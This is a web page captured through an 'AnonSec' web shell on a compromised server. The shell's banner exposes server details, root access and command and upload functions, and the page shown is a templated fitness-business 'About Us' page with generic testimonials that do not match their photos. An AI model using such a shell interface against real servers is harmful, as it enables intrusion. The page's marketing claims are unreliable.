|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/shortable.org/../aliverapid.org/../totalbodyfitnessgym.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>About Us - Totalbodyfitnessgym</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<meta name="theme-variant" content="0a9b5a7f8113e4528e6566beaadfb21f">
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="fixed w-full z-50 top-0 bg-gradient-to-r from-gray-900 to-gray-800 text-white shadow-xl">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto px-6 py-2">
<a href="./" class="flex items-center space-x-3">
<div class="w-10 h-10 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-lg flex items-center justify-center">
<span class="text-white font-bold">T</span>
</div>
<span class="self-center text-xl font-bold">
Totalbodyfitnessgym </span>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-white rounded-lg md:hidden hover:bg-white/10">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-medium flex flex-col md:flex-row md:space-x-6 items-center">
<li><a href="/Home</a></li>
<li><a href="about-us.php" class="block py-2 px-3 text-white/80 hover:text-white transition-colors">About</a></li>
<li><a href="blog/" class="block py-2 px-3 text-white/80 hover:text-white transition-colors">Blog</a></li>
<li>
<a href="contact.php" class="block py-2.5 px-6 bg-white text-gray-900 rounded-lg hover:bg-gray-100 transition-all font-semibold">Contact</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="bg-white py-20" id="about">
<div class="max-w-screen-xl mx-auto px-4">
<div class="flex flex-col-reverse lg:flex-row gap-12 items-center">
<div class="lg:w-1/2">
<div class="grid grid-cols-2 gap-4">
<div class="space-y-4">
<div class="bg-indigo-100 p-8 rounded-2xl">
<div class="text-4xl font-black text-indigo-600 mb-2">15+</div>
<div class="text-sm font-semibold text-gray-700">Years Experience</div>
</div>
<img src="https://images.unsplash.com/photo-Q1p7bh3SHj8?w=1200&h=800&fit=crop&auto=format&q=80" alt="About" class="rounded-2xl w-full h-48 object-cover">
</div>
<div class="space-y-4 pt-12">
<img src="https://images.unsplash.com/photo-5fNmWej4tAA?w=1200&h=800&fit=crop&auto=format&q=80" alt="Team" class="rounded-2xl w-full h-48 object-cover">
<div class="bg-violet-100 p-8 rounded-2xl">
<div class="text-4xl font-black text-violet-600 mb-2">98%</div>
<div class="text-sm font-semibold text-gray-700">Client Satisfaction</div>
</div>
</div>
</div>
</div>
<div class="lg:w-1/2">
<span class="inline-block px-4 py-2 bg-indigo-600 text-white text-xs font-bold uppercase rounded-full mb-6">
Fitness Innovation </span>
<h2 class="text-5xl font-black text-gray-900 mb-6">
Boost retention with automated engagement tools </h2>
<p class="text-lg text-gray-600 mb-8 leading-relaxed">
Our comprehensive fitness platform helps gyms, studios, and trainers deliver exceptional member experiences while streamlining operations. From class booking to progress tracking, everything you need in one place. </p>
<ul class="space-y-4 mb-10">
<li class="flex items-center space-x-3">
<i class="fas fa-check-circle text-green-500 text-xl"></i>
<span class="text-gray-900 font-semibold">Industry Leaders</span>
</li>
<li class="flex items-center space-x-3">
<i class="fas fa-check-circle text-green-500 text-xl"></i>
<span class="text-gray-900 font-semibold">Certified Professionals</span>
</li>
<li class="flex items-center space-x-3">
<i class="fas fa-check-circle text-green-500 text-xl"></i>
<span class="text-gray-900 font-semibold">Award-Winning Service</span>
</li>
</ul>
<a href="#contact" class="inline-block px-10 py-5 bg-gradient-to-r from-indigo-600 to-violet-600 text-white font-bold rounded-full hover:shadow-2xl transition-all">
Transform your gym </a>
</div>
</div>
</div>
</section>
<section class="relative bg-gradient-to-br from-indigo-600 to-violet-700 py-24 overflow-hidden" id="features">
<div class="absolute inset-0 opacity-10">
<div class="absolute top-0 left-0 w-96 h-96 bg-white rounded-full -translate-x-1/2 -translate-y-1/2"></div>
<div class="absolute bottom-0 right-0 w-96 h-96 bg-white rounded-full translate-x-1/2 translate-y-1/2"></div>
</div>
<div class="max-w-screen-xl mx-auto px-4 relative z-10">
<div class="text-center mb-20">
<h2 class="text-5xl md:text-6xl font-black text-white mb-6">Powerful Features</h2>
<p class="text-xl text-white/90 max-w-3xl mx-auto">Everything you need to succeed</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-6">
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-bolt text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Fast</h3>
<p class="text-gray-600">Lightning speed</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-lock text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Secure</h3>
<p class="text-gray-600">Bank security</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-mobile-alt text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Mobile</h3>
<p class="text-gray-600">All devices</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-sync text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Updated</h3>
<p class="text-gray-600">Always current</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-users text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Team</h3>
<p class="text-gray-600">Collaboration</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-chart-bar text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Analytics</h3>
<p class="text-gray-600">Insights</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-cloud text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Cloud</h3>
<p class="text-gray-600">Anywhere</p>
</div>
<div class="bg-white rounded-3xl p-8 shadow-2xl text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-cog text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Custom</h3>
<p class="text-gray-600">Tailored</p>
</div>
</div>
</div>
</section>
<section class="bg-white py-20">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-6">
<div class="group relative bg-gradient-to-br from-gray-50 to-white rounded-3xl p-8 border-2 border-gray-200 hover:border-indigo-300 transition-all">
<div class="absolute top-4 right-4 w-16 h-16 bg-indigo-100 rounded-2xl opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="relative text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-4 group-hover:rotate-6 transition-transform">
<i class="fas fa-smile text-white text-xl"></i>
</div>
<div class="text-5xl font-black text-indigo-600 mb-2">500+</div>
<div class="text-gray-700 font-semibold">Happy Clients</div>
</div>
</div>
<div class="group relative bg-gradient-to-br from-gray-50 to-white rounded-3xl p-8 border-2 border-gray-200 hover:border-indigo-300 transition-all">
<div class="absolute top-4 right-4 w-16 h-16 bg-indigo-100 rounded-2xl opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="relative text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-4 group-hover:rotate-6 transition-transform">
<i class="fas fa-heart text-white text-xl"></i>
</div>
<div class="text-5xl font-black text-indigo-600 mb-2">98%</div>
<div class="text-gray-700 font-semibold">Satisfaction</div>
</div>
</div>
<div class="group relative bg-gradient-to-br from-gray-50 to-white rounded-3xl p-8 border-2 border-gray-200 hover:border-indigo-300 transition-all">
<div class="absolute top-4 right-4 w-16 h-16 bg-indigo-100 rounded-2xl opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="relative text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-4 group-hover:rotate-6 transition-transform">
<i class="fas fa-headset text-white text-xl"></i>
</div>
<div class="text-5xl font-black text-indigo-600 mb-2">24/7</div>
<div class="text-gray-700 font-semibold">Support</div>
</div>
</div>
<div class="group relative bg-gradient-to-br from-gray-50 to-white rounded-3xl p-8 border-2 border-gray-200 hover:border-indigo-300 transition-all">
<div class="absolute top-4 right-4 w-16 h-16 bg-indigo-100 rounded-2xl opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="relative text-center">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center mx-auto mb-4 group-hover:rotate-6 transition-transform">
<i class="fas fa-award text-white text-xl"></i>
</div>
<div class="text-5xl font-black text-indigo-600 mb-2">15+</div>
<div class="text-gray-700 font-semibold">Years</div>
</div>
</div>
</div>
</div>
</section>
<section class="bg-indigo-600 py-20" id="testimonials">
<div class="max-w-screen-xl mx-auto px-4">
<div class="text-center text-white mb-16">
<h2 class="text-6xl font-black mb-4">Client Testimonials</h2>
<p class="text-2xl text-white/80">Don't just take our word for it</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-6">
<div class="bg-white rounded-2xl p-6 text-center">
<img src="https://randomuser.me/api/portraits/men/21.jpg" alt="Amanda Foster" class="w-20 h-20 rounded-full mx-auto mb-4 bg-gray-100 border-4 border-indigo-100">
<div class="flex justify-center mb-3">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 text-sm mb-4">"Integrated nutrition tracking and progress monitoring exceeded expectations. Members love it."</p>
<div class="font-bold text-gray-900 text-sm">Amanda Foster</div>
<div class="text-xs text-gray-600 mt-1">Wellness Manager</div>
</div>
<div class="bg-white rounded-2xl p-6 text-center">
<img src="https://randomuser.me/api/portraits/men/37.jpg" alt="Jessica Rivera" class="w-20 h-20 rounded-full mx-auto mb-4 bg-gray-100 border-4 border-indigo-100">
<div class="flex justify-center mb-3">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 text-sm mb-4">"Class booking and member management became seamless. Staff efficiency improved dramatically."</p>
<div class="font-bold text-gray-900 text-sm">Jessica Rivera</div>
<div class="text-xs text-gray-600 mt-1">Fitness Director</div>
</div>
<div class="bg-white rounded-2xl p-6 text-center">
<img src="https://randomuser.me/api/portraits/men/67.jpg" alt="Brandon Lee" class="w-20 h-20 rounded-full mx-auto mb-4 bg-gray-100 border-4 border-indigo-100">
<div class="flex justify-center mb-3">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 text-sm mb-4">"Client tracking and workout programming tools are game-changing. My business grew 3x in one year."</p>
<div class="font-bold text-gray-900 text-sm">Brandon Lee</div>
<div class="text-xs text-gray-600 mt-1">Personal Trainer</div>
</div>
<div class="bg-white rounded-2xl p-6 text-center">
<img src="https://randomuser.me/api/portraits/men/39.jpg" alt="Tyler Jackson" class="w-20 h-20 rounded-full mx-auto mb-4 bg-gray-100 border-4 border-indigo-100">
<div class="flex justify-center mb-3">
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
<i class="fas fa-star text-yellow-400 text-sm"></i>
</div>
<p class="text-gray-700 text-sm mb-4">"Membership management and billing automation saved us 20 hours per week. Incredible system."</p>
<div class="font-bold text-gray-900 text-sm">Tyler Jackson</div>
<div class="text-xs text-gray-600 mt-1">CrossFit Owner</div>
</div>
</div>
</div>
</section>
<footer class="bg-gradient-to-br from-indigo-600 to-violet-600 text-white">
<div class="max-w-screen-xl mx-auto px-6 py-16">
<div class="grid md:grid-cols-4 gap-10">
<div class="md:col-span-2 space-y-4">
<a href="./" class="inline-flex items-center space-x-3">
<div class="w-12 h-12 rounded-full bg-white text-indigo-600 font-black text-xl flex items-center justify-center">
T </div>
<span class="text-3xl font-black">Totalbodyfitnessgym</span>
</a>
<p class="text-white/70 max-w-lg">Delivering high-impact fitness solutions powered by strategy, storytelling, and automation.</p>
<div class="flex space-x-4 text-sm">
<div class="flex items-center space-x-2"><i class="fas fa-phone"></i><span>+1-310-998-2474</span></div>
<div class="flex items-center space-x-2"><i class="fas fa-envelope"></i><span>hello@totalbodyfitnessgym.com</span></div>
</div>
</div>
<div>
<h3 class="text-lg font-bold mb-4">Explore</h3>
<ul class="space-y-3 text-white/70">
<li><a href="/Home</a></li>
<li><a href="about-us.php" class="hover:text-white transition">About</a></li>
<li><a href="blog/" class="hover:text-white transition">Blog</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-bold mb-4">Office</h3>
<p class="text-white/70 mb-4 leading-relaxed">741 Pennsylvania Avenue, Washington, DC 20004</p>
<a href="contact.php" class="inline-flex items-center space-x-2 px-5 py-3 bg-white/10 rounded-xl font-semibold hover:bg-white hover:text-indigo-600 transition">
<span>Schedule Consultation</span>
<i class="fas fa-arrow-right"></i>
</a>
</div>
</div>
<div class="border-t border-white/20 mt-12 pt-8 flex flex-col md:flex-row md:items-center md:justify-between text-sm text-white/70">
<span>© 2026 Totalbodyfitnessgym. Crafted for bold leaders.</span>
<div class="flex space-x-6 mt-4 md:mt-0">
<a href="privacy.php" class="hover:text-white transition">Privacy</a>
<a href="terms.php" class="hover:text-white transition">Terms</a>
<a href="disclaimer.php" class="hover:text-white transition">Disclaimer</a>
</div>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021